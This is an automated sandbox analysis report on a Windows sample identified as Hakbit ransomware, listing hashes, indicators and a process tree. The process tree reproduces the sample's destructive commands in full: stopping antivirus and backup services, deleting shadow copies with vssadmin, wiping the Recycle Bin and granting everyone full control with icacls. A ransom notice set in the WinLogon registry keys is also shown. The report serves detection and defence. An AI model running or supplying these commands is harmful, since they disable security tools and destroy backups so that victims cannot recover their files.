Analysis
-
max time kernel
150s -
max time network
131s -
platform
windows10_x64 -
resource
win10 -
submitted
18-06-2020 04:28
Static task
static1
Behavioral task
behavioral1
Sample
System.exe
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
System.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
System.exe
-
Size
66KB
-
MD5
8d6ab03994b0ce3466873aa7532fe76b
-
SHA1
156aecd4d8e65d205181ad5eace466c8798d3c86
-
SHA256
e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62
-
SHA512
2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c
Score
10/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 248 IoCs
description pid Process procid_target PID 1656 wrote to memory of 3508 1656 System.exe 67 PID 1656 wrote to memory of 3508 1656 System.exe 67 PID 3508 wrote to memory of 3812 3508 net.exe 69 PID 3508 wrote to memory of 3812 3508 net.exe 69 PID 1656 wrote to memory of 3880 1656 System.exe 70 PID 1656 wrote to memory of 3880 1656 System.exe 70 PID 3880 wrote to memory of 3808 3880 net.exe 72 PID 3880 wrote to memory of 3808 3880 net.exe 72 PID 1656 wrote to memory of 3856 1656 System.exe 73 PID 1656 wrote to memory of 3856 1656 System.exe 73 PID 3856 wrote to memory of 1908 3856 net.exe 75 PID 3856 wrote to memory of 1908 3856 net.exe 75 PID 1656 wrote to memory of 988 1656 System.exe 76 PID 1656 wrote to memory of 988 1656 System.exe 76 PID 988 wrote to memory of 3376 988 net.exe 78 PID 988 wrote to memory of 3376 988 net.exe 78 PID 1656 wrote to memory of 3944 1656 System.exe 79 PID 1656 wrote to memory of 3944 1656 System.exe 79 PID 3944 wrote to memory of 3388 3944 net.exe 81 PID 3944 wrote to memory of 3388 3944 net.exe 81 PID 1656 wrote to memory of 2576 1656 System.exe 82 PID 1656 wrote to memory of 2576 1656 System.exe 82 PID 2576 wrote to memory of 3064 2576 net.exe 84 PID 2576 wrote to memory of 3064 2576 net.exe 84 PID 1656 wrote to memory of 3588 1656 System.exe 85 PID 1656 wrote to memory of 3588 1656 System.exe 85 PID 3588 wrote to memory of 2288 3588 net.exe 87 PID 3588 wrote to memory of 2288 3588 net.exe 87 PID 1656 wrote to memory of 2116 1656 System.exe 88 PID 1656 wrote to memory of 2116 1656 System.exe 88 PID 2116 wrote to memory of 728 2116 net.exe 90 PID 2116 wrote to memory of 728 2116 net.exe 90 PID 1656 wrote to memory of 3628 1656 System.exe 91 PID 1656 wrote to memory of 3628 1656 System.exe 91 PID 3628 wrote to memory of 3852 3628 net.exe 93 PID 3628 wrote to memory of 3852 3628 net.exe 93 PID 1656 wrote to memory of 3524 1656 System.exe 94 PID 1656 wrote to memory of 3524 1656 System.exe 94 PID 3524 wrote to memory of 3808 3524 net.exe 96 PID 3524 wrote to memory of 3808 3524 net.exe 96 PID 1656 wrote to memory of 4052 1656 System.exe 97 PID 1656 wrote to memory of 4052 1656 System.exe 97 PID 4052 wrote to memory of 3796 4052 net.exe 99 PID 4052 wrote to memory of 3796 4052 net.exe 99 PID 1656 wrote to memory of 996 1656 System.exe 100 PID 1656 wrote to memory of 996 1656 System.exe 100 PID 996 wrote to memory of 3948 996 net.exe 102 PID 996 wrote to memory of 3948 996 net.exe 102 PID 1656 wrote to memory of 3868 1656 System.exe 103 PID 1656 wrote to memory of 3868 1656 System.exe 103 PID 3868 wrote to memory of 1640 3868 net.exe 105 PID 3868 wrote to memory of 1640 3868 net.exe 105 PID 1656 wrote to memory of 2668 1656 System.exe 106 PID 1656 wrote to memory of 2668 1656 System.exe 106 PID 2668 wrote to memory of 1560 2668 net.exe 108 PID 2668 wrote to memory of 1560 2668 net.exe 108 PID 1656 wrote to memory of 2760 1656 System.exe 109 PID 1656 wrote to memory of 2760 1656 System.exe 109 PID 2760 wrote to memory of 780 2760 net.exe 111 PID 2760 wrote to memory of 780 2760 net.exe 111 PID 1656 wrote to memory of 2112 1656 System.exe 112 PID 1656 wrote to memory of 2112 1656 System.exe 112 PID 2112 wrote to memory of 2152 2112 net.exe 114 PID 2112 wrote to memory of 2152 2112 net.exe 114 PID 1656 wrote to memory of 2888 1656 System.exe 115 PID 1656 wrote to memory of 2888 1656 System.exe 115 PID 2888 wrote to memory of 3520 2888 net.exe 117 PID 2888 wrote to memory of 3520 2888 net.exe 117 PID 1656 wrote to memory of 3836 1656 System.exe 118 PID 1656 wrote to memory of 3836 1656 System.exe 118 PID 3836 wrote to memory of 3984 3836 net.exe 120 PID 3836 wrote to memory of 3984 3836 net.exe 120 PID 1656 wrote to memory of 972 1656 System.exe 121 PID 1656 wrote to memory of 972 1656 System.exe 121 PID 972 wrote to memory of 3756 972 net.exe 123 PID 972 wrote to memory of 3756 972 net.exe 123 PID 1656 wrote to memory of 3940 1656 System.exe 124 PID 1656 wrote to memory of 3940 1656 System.exe 124 PID 3940 wrote to memory of 3368 3940 net.exe 126 PID 3940 wrote to memory of 3368 3940 net.exe 126 PID 1656 wrote to memory of 1640 1656 System.exe 127 PID 1656 wrote to memory of 1640 1656 System.exe 127 PID 1640 wrote to memory of 3228 1640 net.exe 129 PID 1640 wrote to memory of 3228 1640 net.exe 129 PID 1656 wrote to memory of 64 1656 System.exe 130 PID 1656 wrote to memory of 64 1656 System.exe 130 PID 64 wrote to memory of 1336 64 net.exe 132 PID 64 wrote to memory of 1336 64 net.exe 132 PID 1656 wrote to memory of 776 1656 System.exe 133 PID 1656 wrote to memory of 776 1656 System.exe 133 PID 776 wrote to memory of 3640 776 net.exe 135 PID 776 wrote to memory of 3640 776 net.exe 135 PID 1656 wrote to memory of 2960 1656 System.exe 136 PID 1656 wrote to memory of 2960 1656 System.exe 136 PID 2960 wrote to memory of 3764 2960 net.exe 138 PID 2960 wrote to memory of 3764 2960 net.exe 138 PID 1656 wrote to memory of 3572 1656 System.exe 139 PID 1656 wrote to memory of 3572 1656 System.exe 139 PID 3572 wrote to memory of 3648 3572 net.exe 141 PID 3572 wrote to memory of 3648 3572 net.exe 141 PID 1656 wrote to memory of 992 1656 System.exe 142 PID 1656 wrote to memory of 992 1656 System.exe 142 PID 992 wrote to memory of 3884 992 net.exe 144 PID 992 wrote to memory of 3884 992 net.exe 144 PID 1656 wrote to memory of 1908 1656 System.exe 145 PID 1656 wrote to memory of 1908 1656 System.exe 145 PID 1908 wrote to memory of 1800 1908 net.exe 147 PID 1908 wrote to memory of 1800 1908 net.exe 147 PID 1656 wrote to memory of 3268 1656 System.exe 148 PID 1656 wrote to memory of 3268 1656 System.exe 148 PID 3268 wrote to memory of 3388 3268 net.exe 150 PID 3268 wrote to memory of 3388 3268 net.exe 150 PID 1656 wrote to memory of 3020 1656 System.exe 151 PID 1656 wrote to memory of 3020 1656 System.exe 151 PID 3020 wrote to memory of 2916 3020 net.exe 153 PID 3020 wrote to memory of 2916 3020 net.exe 153 PID 1656 wrote to memory of 2044 1656 System.exe 154 PID 1656 wrote to memory of 2044 1656 System.exe 154 PID 2044 wrote to memory of 736 2044 net.exe 156 PID 2044 wrote to memory of 736 2044 net.exe 156 PID 1656 wrote to memory of 3848 1656 System.exe 157 PID 1656 wrote to memory of 3848 1656 System.exe 157 PID 3848 wrote to memory of 3852 3848 net.exe 159 PID 3848 wrote to memory of 3852 3848 net.exe 159 PID 1656 wrote to memory of 3828 1656 System.exe 160 PID 1656 wrote to memory of 3828 1656 System.exe 160 PID 3828 wrote to memory of 3908 3828 net.exe 162 PID 3828 wrote to memory of 3908 3828 net.exe 162 PID 1656 wrote to memory of 4044 1656 System.exe 163 PID 1656 wrote to memory of 4044 1656 System.exe 163 PID 4044 wrote to memory of 3760 4044 net.exe 165 PID 4044 wrote to memory of 3760 4044 net.exe 165 PID 1656 wrote to memory of 3920 1656 System.exe 166 PID 1656 wrote to memory of 3920 1656 System.exe 166 PID 3920 wrote to memory of 1012 3920 net.exe 168 PID 3920 wrote to memory of 1012 3920 net.exe 168 PID 1656 wrote to memory of 3388 1656 System.exe 169 PID 1656 wrote to memory of 3388 1656 System.exe 169 PID 3388 wrote to memory of 3064 3388 net.exe 171 PID 3388 wrote to memory of 3064 3388 net.exe 171 PID 1656 wrote to memory of 400 1656 System.exe 172 PID 1656 wrote to memory of 400 1656 System.exe 172 PID 400 wrote to memory of 3840 400 net.exe 174 PID 400 wrote to memory of 3840 400 net.exe 174 PID 1656 wrote to memory of 3636 1656 System.exe 175 PID 1656 wrote to memory of 3636 1656 System.exe 175 PID 1656 wrote to memory of 3712 1656 System.exe 177 PID 1656 wrote to memory of 3712 1656 System.exe 177 PID 1656 wrote to memory of 3024 1656 System.exe 179 PID 1656 wrote to memory of 3024 1656 System.exe 179 PID 1656 wrote to memory of 3808 1656 System.exe 181 PID 1656 wrote to memory of 3808 1656 System.exe 181 PID 1656 wrote to memory of 3928 1656 System.exe 183 PID 1656 wrote to memory of 3928 1656 System.exe 183 PID 1656 wrote to memory of 612 1656 System.exe 186 PID 1656 wrote to memory of 612 1656 System.exe 186 PID 1656 wrote to memory of 736 1656 System.exe 188 PID 1656 wrote to memory of 736 1656 System.exe 188 PID 1656 wrote to memory of 1564 1656 System.exe 190 PID 1656 wrote to memory of 1564 1656 System.exe 190 PID 1656 wrote to memory of 3780 1656 System.exe 194 PID 1656 wrote to memory of 3780 1656 System.exe 194 PID 1656 wrote to memory of 3228 1656 System.exe 196 PID 1656 wrote to memory of 3228 1656 System.exe 196 PID 1656 wrote to memory of 740 1656 System.exe 198 PID 1656 wrote to memory of 740 1656 System.exe 198 PID 1656 wrote to memory of 272 1656 System.exe 200 PID 1656 wrote to memory of 272 1656 System.exe 200 PID 1656 wrote to memory of 2000 1656 System.exe 202 PID 1656 wrote to memory of 2000 1656 System.exe 202 PID 1656 wrote to memory of 2660 1656 System.exe 204 PID 1656 wrote to memory of 2660 1656 System.exe 204 PID 1656 wrote to memory of 2980 1656 System.exe 206 PID 1656 wrote to memory of 2980 1656 System.exe 206 PID 1656 wrote to memory of 728 1656 System.exe 208 PID 1656 wrote to memory of 728 1656 System.exe 208 PID 1656 wrote to memory of 3324 1656 System.exe 210 PID 1656 wrote to memory of 3324 1656 System.exe 210 PID 1656 wrote to memory of 1336 1656 System.exe 212 PID 1656 wrote to memory of 1336 1656 System.exe 212 PID 1656 wrote to memory of 688 1656 System.exe 214 PID 1656 wrote to memory of 688 1656 System.exe 214 PID 1656 wrote to memory of 284 1656 System.exe 216 PID 1656 wrote to memory of 284 1656 System.exe 216 PID 1656 wrote to memory of 3764 1656 System.exe 218 PID 1656 wrote to memory of 3764 1656 System.exe 218 PID 1656 wrote to memory of 3640 1656 System.exe 220 PID 1656 wrote to memory of 3640 1656 System.exe 220 PID 1656 wrote to memory of 496 1656 System.exe 222 PID 1656 wrote to memory of 496 1656 System.exe 222 PID 1656 wrote to memory of 2344 1656 System.exe 224 PID 1656 wrote to memory of 2344 1656 System.exe 224 PID 1656 wrote to memory of 2652 1656 System.exe 226 PID 1656 wrote to memory of 2652 1656 System.exe 226 PID 1656 wrote to memory of 1560 1656 System.exe 228 PID 1656 wrote to memory of 1560 1656 System.exe 228 PID 1656 wrote to memory of 3988 1656 System.exe 230 PID 1656 wrote to memory of 3988 1656 System.exe 230 PID 1656 wrote to memory of 3936 1656 System.exe 232 PID 1656 wrote to memory of 3936 1656 System.exe 232 PID 1656 wrote to memory of 280 1656 System.exe 234 PID 1656 wrote to memory of 280 1656 System.exe 234 PID 1656 wrote to memory of 3820 1656 System.exe 236 PID 1656 wrote to memory of 3820 1656 System.exe 236 PID 1656 wrote to memory of 3852 1656 System.exe 238 PID 1656 wrote to memory of 3852 1656 System.exe 238 PID 1656 wrote to memory of 3760 1656 System.exe 240 PID 1656 wrote to memory of 3760 1656 System.exe 240 PID 1656 wrote to memory of 420 1656 System.exe 242 PID 1656 wrote to memory of 420 1656 System.exe 242 PID 1656 wrote to memory of 476 1656 System.exe 244 PID 1656 wrote to memory of 476 1656 System.exe 244 PID 1656 wrote to memory of 3064 1656 System.exe 246 PID 1656 wrote to memory of 3064 1656 System.exe 246 PID 1656 wrote to memory of 4116 1656 System.exe 248 PID 1656 wrote to memory of 4116 1656 System.exe 248 PID 1656 wrote to memory of 4160 1656 System.exe 250 PID 1656 wrote to memory of 4160 1656 System.exe 250 PID 1656 wrote to memory of 4204 1656 System.exe 252 PID 1656 wrote to memory of 4204 1656 System.exe 252 PID 1656 wrote to memory of 4252 1656 System.exe 254 PID 1656 wrote to memory of 4252 1656 System.exe 254 PID 1656 wrote to memory of 4296 1656 System.exe 256 PID 1656 wrote to memory of 4296 1656 System.exe 256 PID 1656 wrote to memory of 4340 1656 System.exe 258 PID 1656 wrote to memory of 4340 1656 System.exe 258 PID 1656 wrote to memory of 4384 1656 System.exe 260 PID 1656 wrote to memory of 4384 1656 System.exe 260 PID 1656 wrote to memory of 4428 1656 System.exe 262 PID 1656 wrote to memory of 4428 1656 System.exe 262 PID 1656 wrote to memory of 4472 1656 System.exe 264 PID 1656 wrote to memory of 4472 1656 System.exe 264 PID 1656 wrote to memory of 4516 1656 System.exe 266 PID 1656 wrote to memory of 4516 1656 System.exe 266 PID 1656 wrote to memory of 4560 1656 System.exe 268 PID 1656 wrote to memory of 4560 1656 System.exe 268 PID 1656 wrote to memory of 4604 1656 System.exe 270 PID 1656 wrote to memory of 4604 1656 System.exe 270 PID 1656 wrote to memory of 4648 1656 System.exe 272 PID 1656 wrote to memory of 4648 1656 System.exe 272 PID 1656 wrote to memory of 4692 1656 System.exe 274 PID 1656 wrote to memory of 4692 1656 System.exe 274 PID 1656 wrote to memory of 4780 1656 System.exe 277 PID 1656 wrote to memory of 4780 1656 System.exe 277 PID 1656 wrote to memory of 4856 1656 System.exe 279 PID 1656 wrote to memory of 4856 1656 System.exe 279 PID 1656 wrote to memory of 4920 1656 System.exe 281 PID 1656 wrote to memory of 4920 1656 System.exe 281 -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1656 System.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1656 System.exe Token: SeDebugPrivilege 3928 taskkill.exe Token: SeDebugPrivilege 612 taskkill.exe Token: SeDebugPrivilege 736 taskkill.exe Token: SeBackupPrivilege 3984 vssvc.exe Token: SeRestorePrivilege 3984 vssvc.exe Token: SeAuditPrivilege 3984 vssvc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1656 System.exe -
Modifies service 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." System.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "\r\n*** ATTENTION ***\r\nYour File Locked By \"Military Algorithm\" And Wiped. \r\nFor Recovery Your Files Contact : [email protected]" System.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk System.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Runs net.exe
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1564 vssadmin.exe 740 vssadmin.exe 2660 vssadmin.exe 728 vssadmin.exe 3324 vssadmin.exe 1336 vssadmin.exe 284 vssadmin.exe 3764 vssadmin.exe 3228 vssadmin.exe 688 vssadmin.exe 3780 vssadmin.exe 272 vssadmin.exe 2000 vssadmin.exe 2980 vssadmin.exe -
Modifies file permissions 1 TTPs 29 IoCs
pid Process 4560 icacls.exe 2652 icacls.exe 3988 icacls.exe 280 icacls.exe 4252 icacls.exe 4856 icacls.exe 4920 icacls.exe 4780 icacls.exe 2344 icacls.exe 4296 icacls.exe 4472 icacls.exe 4604 icacls.exe 476 icacls.exe 3064 icacls.exe 4428 icacls.exe 4648 icacls.exe 1560 icacls.exe 3936 icacls.exe 4516 icacls.exe 4160 icacls.exe 4340 icacls.exe 3820 icacls.exe 3852 icacls.exe 4116 icacls.exe 4204 icacls.exe 3760 icacls.exe 420 icacls.exe 4384 icacls.exe 4692 icacls.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Kills process with taskkill 3 IoCs
pid Process 3928 taskkill.exe 612 taskkill.exe 736 taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\System.exe"C:\Users\Admin\AppData\Local\Temp\System.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Modifies WinLogon
- Drops startup file
PID:1656 -
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:3812
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:3808
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:3856 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:1908
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:3376
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:3388
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:3064
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:2288
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:728
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:3852
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵
- Suspicious use of WriteProcessMemory
PID:3524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:3808
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:3796
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:3948
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:1640
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:1560
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:780
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2152
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:2888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:3520
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:3836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:3984
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:972
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:3756
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:3940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:3368
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:1640
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:3228
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:64
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:1336
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:3640
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:2960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:3764
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:3572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:3648
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:3884
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:1908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:1800
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:3268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:3388
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:2916
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:2044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:736
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:3848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:3852
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:3828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:3908
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:3760
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:3920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:1012
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:3388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:3064
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:3840
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:3636
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:3712
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:3024
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:3808
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:3928
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:612
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Suspicious use of AdjustPrivilegeToken
- Kills process with taskkill
PID:736
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1564
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3780
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:3228
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:740
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:272
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2000
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:2660
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:2980
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:728
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:3324
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:1336
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Interacts with shadow copies
PID:688
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Interacts with shadow copies
PID:284
-
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3764
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:3640
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:496
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" A:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2344
-
-
C:\Windows\SYSTEM32\icacls.exe"icacls.exe" B:\* /grant Everyone:F /T /C /Q2⤵
- Modifies file permissions
PID:2652
-
-
